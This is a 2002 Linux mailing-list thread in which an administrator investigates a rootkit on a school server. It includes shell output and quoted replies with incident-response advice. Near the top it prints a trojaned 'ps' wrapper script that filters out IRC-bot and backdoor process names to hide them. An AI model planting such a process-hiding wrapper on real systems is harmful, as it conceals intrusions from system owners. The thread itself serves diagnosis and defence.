cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
UW PICO(tm) 4.0 File: ps
#!/bin/sh
# by DoLittle <[EMAIL PROTECTED]> UnderNet / #uzzi
/bin/xps $1 $2 $3 $4 $5 $6 $7 $8 $9 > ~/.pstmp
cat ~/.pstmp|egrep -v
"dias2002|psybnc|inet|eggdrop|uptime|mech|xps|xw|xwho|xne$
mv ~/.pstmp1 ~/.pstmp >> /dev/null 2>&1
cat ~/.pstmp
rm -fr ~/.pstmp > /dev/null 2>&1
[ Read 7 lines ]
[root@linux bin]# ls ps -l
-rwxr-xr-x 1 root root 295 Mar 20 2002 ps
[root@linux bin]# cd
[root@linux root]# ls -aRl* | grep "/root/.bash_history"
ls: invalid option -- *
Try `ls --help' for more information.
[root@linux root]# ls -aRl * | grep "/root/.bash_history"
[root@linux root]# cd /
[root@linux /]# ls -aRl * | grep "/root/.bash_history"
ls: proc/1070/exe: No such file or directory
ls: proc/17/exe: No such file or directory
ls: proc/2/exe: No such file or directory
ls: proc/221/exe: No such file or directory
ls: proc/3/exe: No such file or directory
ls: proc/4/exe: No such file or directory
ls: proc/5/exe: No such file or directory
ls: proc/6/exe: No such file or directory
ls: proc/7/exe: No such file or directory
ls: proc/8/exe: No such file or directory
ls: proc/9/exe: No such file or directory
ls: proc/92/exe: No such file or directory
----- Original Message -----
From: "dax wood" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, December 12, 2002 10:53 PM
Subject: Re: [sclug-general] security
> the link thing.
>
> go to the root directory, / (this will slow stuff down but it will work)
> and type
>
> ls -aRl * | grep "/root/.bash_history"
> and
> follow the stuff
> --- Daniel Kuecker <[EMAIL PROTECTED]> wrote:
> > the .bash_history is root's, ifconfig is in /sbin but it doesnt do
> > anything
> > when i run it, it says file not found. when i tried to telnet to port
> > 1010
> > it refused me
> > ----- Original Message -----
> > From: "dax wood" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Thursday, December 12, 2002 10:37 PM
> > Subject: Re: [sclug-general] security
> >
> >
> > > have you tried telnet 'ing to the open port for some indication of
> > the
> > > program running?
> > >
> > > and try /sbin/ifconfig
> > > or locate ifconfig
> > >
> > > > and whose .bash_history file are you talking about?
> > >
> > > --- Daniel Kuecker <[EMAIL PROTECTED]> wrote:
> > > > i just ran chkrootkit, it has found a possible LKM infection.
> > port
> > > > 1010 is
> > > > open, nmap says it doesnt know what it is. i cant tell what
> > rootkit
> > > > was
> > > > used. anyone have any ideas on how to stop this? i know the who
> > file
> > > > doesnt
> > > > work, ifconfig doesnt work, .bash_history is linked to another
> > file i
> > > > cant
> > > > find. any suggestions?
> > > > ----- Original Message -----
> > > > From: "dax wood" <[EMAIL PROTECTED]>
> > > > To: <[EMAIL PROTECTED]>
> > > > Sent: Thursday, December 12, 2002 10:22 PM
> > > > Subject: Re: [sclug-general] security
> > > >
> > > >
> > > > >
> > > > > --- Daniel Kuecker <[EMAIL PROTECTED]> wrote:
> > > > > > All,
> > > > > > I have installed a redhat 7.2 box in a local school system.
> > Its
> > > > > > functions include:
> > > > > >
> > > > > > Servers:
> > > > > > FTP
> > > > > > HTTP
> > > > > > SSH
> > > > > > DHCP
> > > > > > DNS
> > > > > > Email
> > > > > >
> > > > > > I have discovered someone created a user account with the
> > home
> > > > dir of
> > > > > > /var/.bash2
> > > > > > > they granted themselves group member of a principal. i noticed
> > > > three
> > > > > > files in their home dir of what appears to be a root exploit
> > > > called
> > > > > > dr. dolittle. i have not heard of this exploit. anyhow, i
> > > > disabled
> > > > > > the account.
> > > > > > i was curious as to how to prevent this from the future. i
> > > > suspect it
> > > > > > is a student causing this. i am wondering if i can disable
> > the
> > > > shell
> > > > > > access to all except a select few. will this cause problems
> > with
> > > > > > email services, etc?
> > > > > > will this prevent users from getting to a shell to run these
> > > > > > exploits?
> > > > > > any help would be greatly appreciated.....
> > > > > > thanks
> > > > > > daniel kuecker
> > > > > >
> > > > >
> > > > > > Best guess would be that someone guessed or manipulated a
> > > > > > privileged account password. Look at logs for connections (if this
> > > > > > was a real hacker you will not find anything). Red Hat has
> > > > > > drwxr-xr-x on /var? If so, only root could have created a home dir
> > > > > > there, so that is proof of a root hack.
> > > > > > as far as the shell goes you can always play with the
> > > > > > inittab file!
> > > > >
> > > > > > In any case you need to upgrade to 8.0, otherwise due to a lot of
> > > > > > httpd->apache and openssl security holes you're like fish in a
> > > > > > barrel.
> > > > >
> > > > > I was a kid once( :) _) and i can remember a certain
> > > > area12
> > > > > hack on the schools main servers long ago...... in a mac unix
> > far
> > > > away
> > > > > never at a school do you use pen or pencil as a
> > password
> > > > >
> > > > > ------ted----
> > > > >
> > > > >
> > > > >
> > > >
> > >
> > >
> >
>
>